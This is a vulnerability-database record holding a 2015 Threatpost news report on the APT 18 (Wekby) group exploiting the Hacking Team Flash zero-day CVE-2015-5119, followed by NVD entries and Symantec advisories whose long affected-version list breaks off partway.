{"id": "THREATPOST:10AFDF2569BF60140B11198E0B2082D8", "hash": "75d7f677e7b4d2eadf05a682d8998ffc", "type": "threatpost", "bulletinFamily": "info", "title": "Wekby APT 18 Exploiting Hacking Team Flash Zero Day", "description": "The Wekby APT group, implicated in a number of [targeted attacks against health care organizations such as Community Health Systems](<https://threatpost.com/apt-gang-branches-out-to-medical-espionage-in-community-health-breach/107828>) and major pharmaceutical companies, is reportedly making use of the Adobe Flash Player zero-day found in the [Hacking Team data dump](<https://threatpost.com/hackers-release-hacking-team-internal-documents-after-breach/113612>).\n\nAccording to Virginia-based security company Volexity, spear phishing messages purporting to be from Adobe have been found spreading a modified version of the Hacking Team exploit that affects Flash Player versions up to 18.0.0.194. Labels found in the code, in fact, refer to Hacking Team, the company said.\n\nInternal emails, sales invoices and other documents leaked since the breach was made public implicate Hacking Team in selling exploits and intrusion software to [oppressive governments and sanctioned countries](<https://threatpost.com/eu-lawmaker-wants-answers-on-hacking-team-sales-to-sanctioned-countries/113638>).\n\nThe spear phishing message found by Volexity urges the victim to download and install an updated version of Flash and includes a link to http://get[.]adobe[.]com that instead redirects the recipient to a site hosted by PEG TECH Inc. The site loads a malicious .swf file exploiting the Flash vulnerability patched yesterday by Adobe.\n\nThe malware executes and connects to a known Webky command and control address hosted in Singapore, Volexity said.\n\n\u201cAny connection involving this IP address or these hostnames should be consider hostile and a likely indicator of compromise,\u201d the company said in its [report](<http://www.volexity.com/blog/?p=158>).\n\nIn the past, the Webky APT group, also known as APT 18, has hosted other malware families from the Singapore IP address, including Poison Ivy and the Gh0st remote access Trojan in this case.\n\nVolexity said that current, patched versions of Flash will display a pop-up dialog with the word \u201cfaile!\u201d prominently displayed.\n\n\u201cIt looks like the attackers may have left a debug message from their testing,\u201d Volexity said. \u201cNot very subtle at all.\n\n\u201cThe attackers are having a field day with this exploit and will not slow down any time soon,\u201d the company said. \u201cPatching is the most prudent course of action to deal with this exploit that is very much in the wild.\u201d\n\nAdobe yesterday [patched the zero day in Flash Player](<https://helpx.adobe.com/security/products/flash-player/apsb15-16.html>), CVE-2015-5119, one of 36 vulnerabilities patched in the update. The Hacking Team bug was the only one being publicly exploited. The update patched a mix of vulnerability classes, including memory address randomization issues, heap buffer overflows, memory corruption bugs, security bypass vulnerabilities, same-origin bypasses, and use-after-free flaws.\n\nThe Flash zero day, it was revealed yesterday as well, was quickly [integrated into the major exploit kits](<https://threatpost.com/hacking-team-flash-zero-day-weaponized-in-exploit-kits/113663>), including Angler, Nuclear and Neutrino, as well as the Metasploit Framework.\n\nSecurity company Bromium, published its [analysis](<http://labs.bromium.com/2015/07/07/adobe-flash-zero-day-vulnerability-exposed-to-public/>) of the zero day, determining it was a byte array use-after-free memory issue that allows an attacker to gain control of a Windows machine running the vulnerable Flash Player. Researcher Nick Cano wrote that Hacking Team built its proof-of-concept code based on a 2014 vulnerability known as the ActionScript-Spray attack (CVE-2014-0322) which took advantage of a UAF bug in Internet Explorer to gain access to the heap of a process.\n\nMeanwhile, yesterday, Department of Homeland Security\u2019s CERT at the Software Engineering Institute at Carnegie Mellon University released an [advisory](<http://www.kb.cert.org/vuls/id/103336>) warning users about a still unpatched Windows kernel vulnerability that was also part of the Hacking Team data dump.\n\nThe flaw lives specifically in the [Adobe Type Manager kernel module in Windows](<https://threatpost.com/details-available-on-patched-adobe-windows-font-vulnerabilities/113454>); the module provides support for OpenType fonts.\n\n\u201cA memory-corruption flaw in Adobe Type Manager allows for manipulation of Windows kernel memory, which can result in a wide range of impacts,\u201d said the CERT advisory. In this case, a successful exploit such as Hacking Team\u2019s could allow an attacker to bypass browser and operating system sandbox protection to obtain System privileges on a Windows computer.\n\n\u201cWe have confirmed that the exploit code successfully obtains SYSTEM privileges on Windows XP through Windows 8.1 systems, both 32-bit and 64-bit,\u201d CERT said.\n", "published": "2015-07-09T14:50:54", "modified": "2015-07-13T18:36:39", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://threatpost.com/apt-group-exploiting-hacking-team-flash-zero-day/113715/", "reporter": "Michael Mimoso", "references": ["https://threatpost.com/apt-gang-branches-out-to-medical-espionage-in-community-health-breach/107828", "https://threatpost.com/hackers-release-hacking-team-internal-documents-after-breach/113612", "https://threatpost.com/eu-lawmaker-wants-answers-on-hacking-team-sales-to-sanctioned-countries/113638", "http://www.volexity.com/blog/?p=158", "https://helpx.adobe.com/security/products/flash-player/apsb15-16.html", "https://threatpost.com/hacking-team-flash-zero-day-weaponized-in-exploit-kits/113663", "http://labs.bromium.com/2015/07/07/adobe-flash-zero-day-vulnerability-exposed-to-public/", "http://www.kb.cert.org/vuls/id/103336", "https://threatpost.com/details-available-on-patched-adobe-windows-font-vulnerabilities/113454"], "cvelist": ["CVE-2014-0322", "CVE-2015-5119"], "lastseen": "2018-10-06T22:56:36", "history": [], "viewCount": 2, "enchantments": {"score": {"value": 9.3, "vector": "NONE", "modified": "2018-10-06T22:56:36"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-5119", "CVE-2014-0322"]}, {"type": "symantec", "idList": ["SMNTC-65551", "SMNTC-75568"]}, {"type": "thn", "idList": ["THN:94A6EEF7B58D5DE9CCE68307A6FA2B6F", "THN:F6B79957FA6EFD8F9C60F4A8646CCE04", "THN:81AF218D527E626B7FE15454B68E5FF0"]}, {"type": "seebug", "idList": ["SSV:61771", "SSV:61455", "SSV:86169", "SSV:86119", "SSV:61753", "SSV:61755", "SSV:61756", "SSV:61754", "SSV:61751"]}, {"type": "threatpost", "idList": ["THREATPOST:342B067585A04A2E2EA010EA2C33DC1B", "THREATPOST:944377914FB1A58CB3F9F096F78260E0", "THREATPOST:A72A91268C8C0871DE1E44E25B215AAF", "THREATPOST:EBDCB2D4445A9B7E6AD0B43B5AE5928B", "THREATPOST:36DC9B1F1EFE6F30B37A56180A6A6163", "THREATPOST:9E1DE5C0DB7F1D8747AD52E14E4C8387", "THREATPOST:644EA98A53DF0E53AF5BDAC1607B06D2", "THREATPOST:B3C0097CBA4C334709D99BB9D477A6DD", "THREATPOST:7E6EDF53838EEFD3BEAC32130CE58C38", "THREATPOST:521E37B95AC41E0A1D35ADB09B1A4835"]}, {"type": "exploitdb", "idList": ["EDB-ID:32904", "EDB-ID:32851", "EDB-ID:37523"]}, {"type": "saint", "idList": ["SAINT:D8D6BCBC7A7819EE47BC5E6D40059708", "SAINT:4AA18219F0F43605A5B96CC5B2DF62FF", "SAINT:6D3D943FE6C76C9CA78A9454A6931B44"]}, {"type": "nessus", "idList": ["SMB_KB2934088.NASL", "OPENSUSE-2015-473.NASL", "FREEBSD_PKG_348BFA6925A211E5ADE10011D823EEBD.NASL", "SMB_NT_MS14-012.NASL", "GOOGLE_CHROME_43_0_2357_132.NASL", "MACOSX_FLASH_PLAYER_APSB15-16.NASL", "FLASH_PLAYER_APSB15-16.NASL", "SUSE_SU-2015-1211-1.NASL", "MACOSX_GOOGLE_CHROME_43_0_2357_132.NASL", "GENTOO_GLSA-201507-13.NASL"]}, {"type": "zdt", "idList": ["1337DAY-ID-23842", "1337DAY-ID-22145", "1337DAY-ID-22151"]}, {"type": "archlinux", "idList": ["ASA-201507-7"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2015:1210-1", "OPENSUSE-SU-2015:1207-1", "SUSE-SU-2015:1214-1", "SUSE-SU-2015:1211-1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:132600", "PACKETSTORM:126178", "PACKETSTORM:126150"]}, {"type": "fireeye", "idList": ["FIREEYE:C1FB4B9FAC84D1B9FD74A7D5A588D1D2", "FIREEYE:C106464BCA41AB0D5AF6965D9907C8C3", "FIREEYE:7D8237F41EA87865A58B16DF63389DAA"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/BROWSER/MS14_012_CMARKUP_UAF", "MSF:EXPLOIT/MULTI/BROWSER/ADOBE_FLASH_HACKING_TEAM_UAF"]}, {"type": "cert", "idList": ["VU:732479", "VU:561288"]}, {"type": "canvas", "idList": ["IE_CMARKUP", "ADOBE_FLASH_VALUEOF"]}, {"type": "freebsd", "idList": ["348BFA69-25A2-11E5-ADE1-0011D823EEBD"]}, {"type": "securelist", "idList": ["SECURELIST:56D279C45B0C4431FBA76FDF2EC365A1", "SECURELIST:75F0B75D28318C525992E42495D8C5EE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:FD11436A13A56E314FE7438DEDAF9FBA"]}, {"type": "mssecure", "idList": ["MSSECURE:A133B2DDF50F8BE904591C1BB592991A"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310804500", "OPENVAS:1361412562310121394", "OPENVAS:1361412562310805903", "OPENVAS:1361412562310805912", "OPENVAS:1361412562310805904", "OPENVAS:1361412562310805911", "OPENVAS:1361412562310130105", "OPENVAS:1361412562310805902", "OPENVAS:1361412562310850845"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:13605", "SECURITYVULNS:VULN:14591"]}, {"type": "kaspersky", "idList": ["KLA10623"]}, {"type": "redhat", "idList": ["RHSA-2015:1214"]}, {"type": "gentoo", "idList": ["GLSA-201507-13"]}], "modified": "2018-10-06T22:56:36"}, "vulnersScore": 9.3}, "objectVersion": "1.4", "_object_type": "robots.models.threatpost.ThreatpostBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.threatpost.ThreatpostBulletin"]}

{"cve": [{"lastseen": "2017-04-18T15:57:27", "bulletinFamily": "NVD", "description": "Use-after-free vulnerability in the ByteArray class in the ActionScript 3 (AS3) implementation in Adobe Flash Player 13.x through 13.0.0.296 and 14.x through 18.0.0.194 on Windows and OS X and 11.x through 11.2.202.468 on Linux allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted Flash content that overrides a valueOf function, as exploited in the wild in July 2015.", "modified": "2017-01-19T21:59:03", "published": "2015-07-08T10:59:05", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5119", "id": "CVE-2015-5119", "title": "CVE-2015-5119", "type": "cve", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-13T11:06:28", "bulletinFamily": "NVD", "description": "Use-after-free vulnerability in Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code via vectors involving crafted JavaScript code, CMarkup, and the onpropertychange attribute of a script element, as exploited in the wild in January and February 2014.", "modified": "2018-10-12T18:05:53", "published": "2014-02-14T11:55:07", "id": "CVE-2014-0322", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0322", "title": "CVE-2014-0322", "type": "cve", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "symantec": [{"lastseen": "2018-03-12T14:14:47", "bulletinFamily": "software", "description": "### Description\n\nMicrosoft Internet Explorer is prone to a remote code-execution vulnerability. Attackers can exploit this issue by enticing an unsuspecting user to view a specially crafted webpage. Attackers can exploit this issue to execute arbitrary code in the context of the currently logged-in user. Failed attacks will cause denial-of-service conditions. Microsoft Internet Explorer 9 and 10 are affected.\n\n### Technologies Affected\n\n * Avaya Aura Conferencing 6.0 \n * Avaya Aura Conferencing 7.0 \n * Avaya CallPilot 4.0 \n * Avaya CallPilot 4.0.1 \n * Avaya CallPilot 5.0 \n * Avaya CallPilot 5.0.1 \n * Avaya Communication Server 1000 Telephony Manager 3.0 \n * Avaya Communication Server 1000 Telephony Manager 3.0.1 \n * Avaya Communication Server 1000 Telephony Manager 4.0 \n * Avaya Communication Server 1000 Telephony Manager 4.0.1 \n * Avaya Meeting Exchange - Client Registration Server 5.0 \n * Avaya Meeting Exchange - Client Registration Server 5.0.1 \n * Avaya Meeting Exchange - Client Registration Server 5.2 \n * Avaya Meeting Exchange - Client Registration Server 5.2.1 \n * Avaya Meeting Exchange - Client Registration Server 6.0 \n * Avaya Meeting Exchange - Client Registration Server 6.2 \n * Avaya Meeting Exchange - Recording Server 5.2.1 \n * Avaya Meeting Exchange - Recording Server 6.0 \n * Avaya Meeting Exchange - Recording Server 6.2 \n * Avaya Meeting Exchange - Streaming Server 5.0 \n * Avaya Meeting Exchange - Streaming Server 5.0 \n * Avaya Meeting Exchange - Streaming Server 5.0.1 \n * Avaya Meeting Exchange - Streaming Server 5.2 \n * Avaya Meeting Exchange - Streaming Server 5.2.1 \n * Avaya Meeting Exchange - Streaming Server 6.0 \n * Avaya Meeting Exchange - Streaming Server 6.2 \n * Avaya Meeting Exchange - Web Conferencing Server 5.0 \n * Avaya Meeting Exchange - Web Conferencing Server 5.0.1 \n * Avaya Meeting Exchange - Web Conferencing Server 5.2 \n * Avaya Meeting Exchange - Web Conferencing Server 5.2.1 \n * Avaya Meeting Exchange - Web Conferencing Server 6.0 \n * Avaya Meeting Exchange - Web Conferencing Server 6.2 \n * Avaya Meeting Exchange - Webportal 5.0 \n * Avaya Meeting Exchange - Webportal 5.0.1 \n * Avaya Meeting Exchange - Webportal 5.2 \n * Avaya Meeting Exchange - Webportal 5.2.1 \n * Avaya Meeting Exchange - Webportal 6.0 \n * Avaya Meeting Exchange - Webportal 6.2 \n * Avaya Messaging Application Server 5.0 \n * Avaya Messaging Application Server 5.0.1 \n * Avaya Messaging Application Server 5.2 \n * Avaya Messaging Application Server 5.2.1 \n * Microsoft Internet Explorer 10 \n * Microsoft Internet Explorer 9 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Implement multiple redundant layers of security.** \nMemory-protection schemes (such as nonexecutable stack and heap configurations and randomly mapped memory segments) will complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2014-02-13T00:00:00", "published": "2014-02-13T00:00:00", "id": "SMNTC-65551", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/65551", "type": "symantec", "title": "Microsoft Internet Explorer CVE-2014-0322 Use-After-Free Remote Code Execution Vulnerability", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-03-14T22:42:32", "bulletinFamily": "software", "description": "### Description\n\nAdobe Flash Player is prone to a remote memory-corruption vulnerability because of a use-after-free error. Attackers can exploit this issue to execute arbitrary code in the context of the user running the affected applications. Failed exploit attempts will likely cause a denial-of-service condition.\n\n### Technologies Affected\n\n * Adobe AIR 1.0 \n * Adobe AIR 1.0.1 \n * Adobe AIR 1.0.4990 \n * Adobe AIR 1.0.8.4990 \n * Adobe AIR 1.01 \n * Adobe AIR 1.1 \n * Adobe AIR 1.1.0.5790 \n * Adobe AIR 1.5 \n * Adobe AIR 1.5.0.7220 \n * Adobe AIR 1.5.1 \n * Adobe AIR 1.5.1.8210 \n * Adobe AIR 1.5.2 \n * Adobe AIR 1.5.3 \n * Adobe AIR 1.5.3.9120 \n * Adobe AIR 1.5.3.9130 \n * Adobe AIR 13.0.0.111 \n * Adobe AIR 13.0.0.83 \n * Adobe AIR 14.0.0.110 \n * Adobe AIR 14.0.0.137 \n * Adobe AIR 14.0.0.178 \n * Adobe AIR 14.0.0.179 \n * Adobe AIR 15.0.0.249 \n * Adobe AIR 15.0.0.252 \n * Adobe AIR 15.0.0.293 \n * Adobe AIR 15.0.0.356 \n * Adobe AIR 16.0.0.245 \n * Adobe AIR 16.0.0.272 \n * Adobe AIR 17.0.0.144 \n * Adobe AIR 17.0.0.172 \n * Adobe AIR 18.0.0.143 \n * Adobe AIR 18.0.0.144 \n * Adobe AIR 2.0.2 \n * Adobe AIR 2.0.2.12610 \n * Adobe AIR 2.0.3 \n * Adobe AIR 2.0.3.13070 \n * Adobe AIR 2.0.4 \n * Adobe AIR 2.5.0.16600 \n * Adobe AIR 2.5.1 \n * Adobe AIR 2.5.1.17730 \n * Adobe AIR 2.6 \n * Adobe AIR 2.6.0.19120 \n * Adobe AIR 2.6.0.19140 \n * Adobe AIR 2.6.19120 \n * Adobe AIR 2.6.19140 \n * Adobe AIR 2.7 \n * Adobe AIR 2.7.0.1948 \n * Adobe AIR 2.7.0.19480 \n * Adobe AIR 2.7.0.1953 \n * Adobe AIR 2.7.0.19530 \n * Adobe AIR 2.7.1 \n * Adobe AIR 2.7.1.1961 \n * Adobe AIR 2.7.1.19610 \n * Adobe AIR 3.0 \n * Adobe AIR 3.0.0.408 \n * Adobe AIR 3.0.0.4080 \n * Adobe AIR 3.1.0.485 \n * Adobe AIR 3.1.0.488 \n * Adobe AIR 3.1.0.4880 \n * Adobe AIR 3.2.0.207 \n * Adobe AIR 3.2.0.2070 \n * Adobe AIR 3.2.0.2080 \n * Adobe AIR 3.3.0.3610 \n * Adobe AIR 3.3.0.3670 \n * Adobe AIR 3.3.0.3690 \n * Adobe AIR 3.4.0.2540 \n * Adobe AIR 3.4.0.2710 \n * Adobe AIR 3.5.0.1060 \n * Adobe AIR 3.5.0.600 \n * Adobe AIR 3.5.0.880 \n * Adobe AIR 3.5.0.890 \n * Adobe AIR 3.6.0.597 \n * Adobe AIR 3.6.0.599 \n * Adobe AIR 3.6.0.6090 \n * Adobe AIR 3.7.0.1530 \n * Adobe AIR 3.7.0.1530 \n * Adobe AIR 3.7.0.1660 \n * Adobe AIR 3.7.0.1660 \n * Adobe AIR 3.7.0.1860 \n * Adobe AIR 3.7.0.2090 \n * Adobe AIR 3.7.0.2100 \n * Adobe AIR 3.8.0.1430 \n * Adobe AIR 3.8.0.870 \n * Adobe AIR 3.8.0.910 \n * Adobe AIR 3.9.0.1060 \n * Adobe AIR 3.9.0.1210 \n * Adobe AIR 3.9.0.1380 \n * Adobe AIR 4 \n * Adobe AIR 4.0.0.1390 \n * Adobe AIR 4.0.0.1390 SDK \n * Adobe AIR 4.0.0.1628 \n * Adobe AIR SDK 13.0.0.111 \n * Adobe AIR SDK 13.0.0.83 \n * Adobe AIR SDK 14.0.0.110 \n * Adobe AIR SDK 14.0.0.137 \n * Adobe AIR SDK 14.0.0.178 \n * Adobe AIR SDK 14.0.0.179 \n * Adobe AIR SDK 15.0.0.249 \n * Adobe AIR SDK 15.0.0.302 \n * Adobe AIR SDK 15.0.0.356 \n * Adobe AIR SDK 16.0.0.272 \n * Adobe AIR SDK 17.0.0.144 \n * Adobe AIR SDK 17.0.0.172 \n * Adobe AIR SDK 18.0.0.143 \n * Adobe AIR SDK 18.0.0.144 \n * Adobe AIR SDK 3.9.0.1380 \n * Adobe AIR SDK 4.0.0.1390 \n * Adobe Flash Player 10 \n * Adobe Flash Player 10.0.0.584 \n * Adobe Flash Player 10.0.12 .35 \n * Adobe Flash Player 10.0.12 .36 \n * Adobe Flash Player 10.0.12.10 \n * Adobe Flash Player 10.0.15 .3 \n * Adobe Flash Player 10.0.2.54 \n * Adobe Flash Player 10.0.22.87 \n * Adobe Flash Player 10.0.32 18 \n * Adobe Flash Player 10.0.32.18 \n * Adobe Flash Player 10.0.42.34 \n * Adobe Flash Player 10.0.45 2 \n * Adobe Flash Player 10.1 \n * Adobe Flash Player 10.1.102.64 \n * Adobe Flash Player 10.1.102.65 \n * Adobe Flash Player 10.1.105.6 \n * Adobe Flash Player 10.1.106.16 \n * Adobe Flash Player 10.1.106.17 \n * Adobe Flash Player 10.1.51.66 \n * Adobe Flash Player 10.1.52.14 \n * Adobe Flash Player 10.1.52.14.1 \n * Adobe Flash Player 10.1.52.15 \n * Adobe Flash Player 10.1.53.64 \n * Adobe Flash Player 10.1.82.76 \n * Adobe Flash Player 10.1.85.3 \n * Adobe Flash Player 10.1.92.10 \n * Adobe Flash Player 10.1.92.8 \n * Adobe Flash Player 10.1.95.1 \n * Adobe Flash Player 10.1.95.2 \n * Adobe Flash Player 10.2.152 \n * Adobe Flash Player 10.2.152.21 \n * Adobe Flash Player 10.2.152.26 \n * Adobe Flash Player 10.2.152.32 \n * Adobe Flash Player 10.2.152.33 \n * Adobe Flash Player 10.2.153.1 \n * Adobe Flash Player 10.2.154.13 \n * Adobe Flash Player 10.2.154.18 \n * Adobe Flash Player 10.2.154.24 \n * Adobe Flash Player 10.2.154.25 \n * Adobe Flash Player 10.2.154.27 \n * Adobe Flash Player 10.2.154.28 \n * Adobe Flash Player 10.2.156.12 \n * Adobe Flash Player 10.2.157.51 \n * Adobe Flash Player 10.2.159.1 \n * Adobe Flash Player 10.3.181.14 \n * Adobe Flash Player 10.3.181.16 \n * Adobe Flash Player 10.3.181.22 \n * Adobe Flash Player 10.3.181.23 \n * Adobe Flash Player 10.3.181.26 \n * Adobe Flash Player 10.3.181.34 \n * Adobe Flash Player 10.3.183.10 \n * Adobe Flash Player 10.3.183.11 \n * Adobe Flash Player 10.3.183.15 \n * Adobe Flash Player 10.3.183.16 \n * Adobe Flash Player 10.3.183.19 \n * Adobe Flash Player 10.3.183.20 \n * Adobe Flash Player 10.3.183.23 \n * Adobe Flash Player 10.3.183.25 \n * Adobe Flash Player 10.3.183.29 \n * Adobe Flash Player 10.3.183.4 \n * Adobe Flash Player 10.3.183.43 \n * Adobe Flash Player 10.3.183.48 \n * Adobe Flash Player 10.3.183.5 \n * Adobe Flash Player 10.3.183.50 \n * Adobe Flash Player 10.3.183.51 \n * Adobe Flash Player 10.3.183.61 \n * Adobe Flash Player 10.3.183.63 \n * Adobe Flash Player 10.3.183.67 \n * Adobe Flash Player 10.3.183.68 \n * Adobe Flash Player 10.3.183.7 \n * Adobe Flash Player 10.3.183.75 \n * Adobe Flash Player 10.3.183.86 \n * Adobe Flash Player 10.3.185.21 \n * Adobe Flash Player 10.3.185.22 \n * Adobe Flash Player 10.3.185.23 \n * Adobe Flash Player 10.3.185.24 \n * Adobe Flash Player 10.3.185.25 \n * Adobe Flash Player 10.3.186.2 \n * Adobe Flash Player 10.3.186.3 \n * Adobe Flash Player 10.3.186.6 \n * Adobe Flash Player 10.3.186.7 \n * Adobe Flash Player 11 \n * Adobe Flash Player 11.0 \n * Adobe Flash Player 11.0.1.129 \n * Adobe Flash Player 11.0.1.152 \n * Adobe Flash Player 11.0.1.153 \n * Adobe Flash Player 11.0.1.60 \n * Adobe Flash Player 11.0.1.98 \n * Adobe Flash Player 11.1 \n * Adobe Flash Player 11.1.102.228 \n * Adobe Flash Player 11.1.102.55 \n * Adobe Flash Player 11.1.102.59 \n * Adobe Flash Player 11.1.102.62 \n * Adobe Flash Player 11.1.102.63 \n * Adobe Flash Player 11.1.111.10 \n * Adobe Flash Player 11.1.111.44 \n * Adobe Flash Player 11.1.111.5 \n * Adobe Flash Player 11.1.111.50 \n * Adobe Flash Player 11.1.111.54 \n * Adobe Flash Player 11.1.111.6 \n * Adobe Flash Player 11.1.111.64 \n * Adobe Flash Player 11.1.111.7 \n * Adobe Flash Player 11.1.111.73 \n * Adobe Flash Player 11.1.111.8 \n * Adobe Flash Player 11.1.111.9 \n * Adobe Flash Player 11.1.112.61 \n * Adobe Flash Player 11.1.115.11 \n * Adobe Flash Player 11.1.115.34 \n * Adobe Flash Player 11.1.115.48 \n * Adobe Flash Player 11.1.115.54 \n * Adobe Flash Player 11.1.115.58 \n * Adobe Flash Player 11.1.115.59 \n * Adobe Flash Player 11.1.115.6 \n * Adobe Flash Player 11.1.115.63 \n * Adobe Flash Player 11.1.115.69 \n * Adobe Flash Player 11.1.115.7 \n * Adobe Flash Player 11.1.115.8 \n * Adobe Flash Player 11.1.115.81 \n * Adobe Flash Player 11.2.202 238 \n * Adobe Flash Player 11.2.202.160 \n * Adobe Flash Player 11.2.202.197 \n * Adobe Flash Player 11.2.202.221 \n * Adobe Flash Player 11.2.202.223 \n * Adobe Flash Player 11.2.202.229 \n * Adobe Flash Player 11.2.202.233 \n * Adobe Flash Player 11.2.202.235 \n * Adobe Flash Player 11.2.202.236 \n * Adobe Flash Player 11.2.202.238 \n * Adobe Flash Player 11.2.202.243 \n * Adobe Flash Player 11.2.202.251 \n * Adobe Flash Player 11.2.202.258 \n * Adobe Flash Player 11.2.202.261 \n * Adobe Flash Player 11.2.202.262 \n * Adobe Flash Player 11.2.202.270 \n * Adobe Flash Player 11.2.202.273 \n * Adobe Flash Player 11.2.202.275 \n * Adobe Flash Player 11.2.202.280 \n * Adobe Flash Player 11.2.202.285 \n * Adobe Flash Player 11.2.202.291 \n * Adobe Flash Player 11.2.202.297 \n * Adobe Flash Player 11.2.202.310 \n * Adobe Flash Player 11.2.202.327 \n * Adobe Flash Player 11.2.202.332 \n * Adobe Flash Player 11.2.202.335 \n * Adobe Flash Player 11.2.202.336 \n * Adobe Flash Player 11.2.202.341 \n * Adobe Flash Player 11.2.202.346 \n * Adobe Flash Player 11.2.202.350 \n * Adobe Flash Player 11.2.202.356 \n * Adobe Flash Player 11.2.202.359 \n * Adobe Flash Player 11.2.202.378 \n * Adobe Flash Player 11.2.202.394 \n * Adobe Flash Player 11.2.202.400 \n * Adobe Flash Player 11.2.202.406 \n * Adobe Flash Player 11.2.202.411 \n * Adobe Flash Player 11.2.202.418 \n * Adobe Flash Player 11.2.202.424 \n * Adobe Flash Player 11.2.202.425 \n * Adobe Flash Player 11.2.202.429 \n * Adobe Flash Player 11.2.202.438 \n * Adobe Flash Player 11.2.202.440 \n * Adobe Flash Player 11.2.202.442 \n * Adobe Flash Player 11.2.202.451 \n * Adobe Flash Player 11.2.202.457 \n * Adobe Flash Player 11.2.202.460 \n * Adobe Flash Player 11.2.202.466 \n * Adobe Flash Player 11.2.202.468 \n * Adobe Flash Player 11.2.202.95 \n * Adobe Flash Player 11.3.300.214 \n * Adobe Flash Player 11.3.300.231 \n * Adobe Flash Player 11.3.300.250 \n * Adobe Flash Player 11.3.300.257 \n * Adobe Flash Player 11.3.300.262 \n * Adobe Flash Player 11.3.300.265 \n * Adobe Flash Player 11.3.300.268 \n * Adobe Flash Player 11.3.300.270 \n * Adobe Flash Player 11.3.300.271 \n * Adobe Flash Player 11.3.300.273 \n * Adobe Flash Player 11.3.31.230 \n * Adobe Flash Player 11.3.378.5 \n * Adobe Flash Player 11.4.400.231 \n * Adobe Flash Player 11.4.402.265 \n * Adobe Flash Player 11.4.402.278 \n * Adobe Flash Player 11.4.402.287 \n * Adobe Flash Player 11.5.500.80 \n * Adobe Flash Player 11.5.502.110 \n * Adobe Flash Player 11.5.502.118 \n * Adobe Flash Player 11.5.502.124 \n * Adobe Flash Player 11.5.502.131 \n * Adobe Flash Player 11.5.502.135 \n * Adobe Flash Player 11.5.502.136 \n * Adobe Flash Player 11.5.502.146 \n * Adobe Flash Player 11.5.502.149 \n * Adobe Flash Player 11.6.602.105 \n * Adobe Flash Player 11.6.602.167 \n * Adobe Flash Player 11.6.602.168 \n * Adobe Flash Player 11.6.602.171 \n * Adobe Flash Player 11.6.602.180 \n * Adobe Flash Player 11.7.700.169 \n * Adobe Flash Player 11.7.700.202 \n * Adobe Flash Player 11.7.700.203 \n * Adobe Flash Player 11.7.700.224 \n * Adobe Flash Player 11.7.700.225 \n * Adobe Flash Player 11.7.700.232 \n * Adobe Flash Player 11.7.700.242 \n * Adobe Flash Player 11.7.700.252 \n * Adobe Flash Player 11.7.700.257 \n * Adobe Flash Player 11.7.700.260 \n * Adobe Flash Player 11.7.700.261 \n * Adobe Flash Player 11.7.700.269 \n * Adobe Flash Player 11.7.700.272 \n * Adobe Flash Player 11.7.700.275 \n * Adobe Flash Player 11.7.700.279 \n * Adobe Flash Player 11.8.800.168 \n * Adobe Flash Player 11.8.800.170 \n * Adobe Flash Player 11.8.800.94 \n * Adobe Flash Player 11.8.800.97 \n * Adobe Flash Player 11.9.900.117 \n * Adobe Flash Player 11.9.900.152 \n * Adobe Flash Player 11.9.900.170 \n * Adobe Flash Player 12 \n * Adobe Flash Player 12.0.0.38 \n * Adobe Flash Player 12.0.0.41 \n * Adobe Flash Player 12.0.0.43 \n * Adobe Flash Player 12.0.0.44 \n * Adobe Flash Player 12.0.0.70 \n * Adobe Flash Player 12.0.0.77 \n * Adobe Flash Player 13.0.0.182 \n * Adobe Flash Player 13.0.0.201 \n * Adobe Flash Player 13.0.0.206 \n * Adobe Flash Player 13.0.0.214 \n * Adobe Flash Player 13.0.0.223 \n * Adobe Flash Player 13.0.0.231 \n * Adobe Flash Player 13.0.0.241 \n * Adobe Flash Player 13.0.0.244 \n * Adobe Flash Player 13.0.0.250 \n * Adobe Flash Player 13.0.0.252 \n * Adobe Flash Player 13.0.0.258 \n * Adobe Flash Player 13.0.0.259 \n * Adobe Flash Player 13.0.0.260 \n * Adobe Flash Player 13.0.0.262 \n * Adobe Flash Player 13.0.0.264 \n * Adobe Flash Player 13.0.0.269 \n * Adobe Flash Player 13.0.0.277 \n * Adobe Flash Player 13.0.0.281 \n * Adobe Flash Player 13.0.0.289 \n * Adobe Flash Player 13.0.0.292 \n * Adobe Flash Player 13.0.0.296 \n * Adobe Flash Player 14.0.0.125 \n * Adobe Flash Player 14.0.0.145 \n * Adobe Flash Player 14.0.0.176 \n * Adobe Flash Player 14.0.0.177 \n * Adobe Flash Player 14.0.0.179 \n * Adobe Flash Player 15.0.0.152 \n * Adobe Flash Player 